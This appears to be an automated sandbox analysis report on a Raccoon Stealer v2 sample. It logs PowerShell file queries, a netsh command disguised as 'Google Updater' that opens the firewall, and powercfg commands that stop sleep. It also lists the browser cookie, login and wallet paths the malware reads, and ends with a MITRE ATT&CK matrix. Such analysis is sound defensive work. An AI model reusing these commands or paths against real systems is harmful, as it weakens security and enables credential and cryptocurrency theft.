Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Queries volume information: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Queries volume information: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe

Code function: 42_2_00F22B57 cpuid

42_2_00F22B57

Source: C:\Users\user\Desktop\Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738DA73B0 GetSystemTimeAsFileTime,

1_2_00007FF738DA73B0

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\GoogleUpdate.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Modifies the windows firewall

Source: C:\Windows\GoogleUpdate.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL

Stealing of Sensitive Information

Yara detected Raccoon Stealer v2

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.344306639.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.333348862.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.337025443.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361416689.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.342598570.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.465250354.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343308304.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.339209426.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340250464.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345979893.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.338031072.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.338723877.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.339040601.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.342801779.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.360447760.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.341764922.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340857306.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345866968.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.336335986.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.333379170.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.335268908.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\			Jump to behavior

Remote Access Functionality

Yara detected Raccoon Stealer v2

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.344306639.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.333348862.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.337025443.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361416689.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.342598570.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.465250354.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343308304.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.339209426.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340250464.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345979893.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.338031072.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.338723877.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.339040601.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.342801779.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.360447760.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.341764922.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340857306.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345866968.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.336335986.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.333379170.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.335268908.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	31 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Native API	1 Windows Service	1 Windows Service	21 Deobfuscate/Decode Files or Information	1 Credential API Hooking	2 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	11 Scheduled Task/Job	611 Process Injection	3 Obfuscated Files or Information	1 Input Capture	235 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
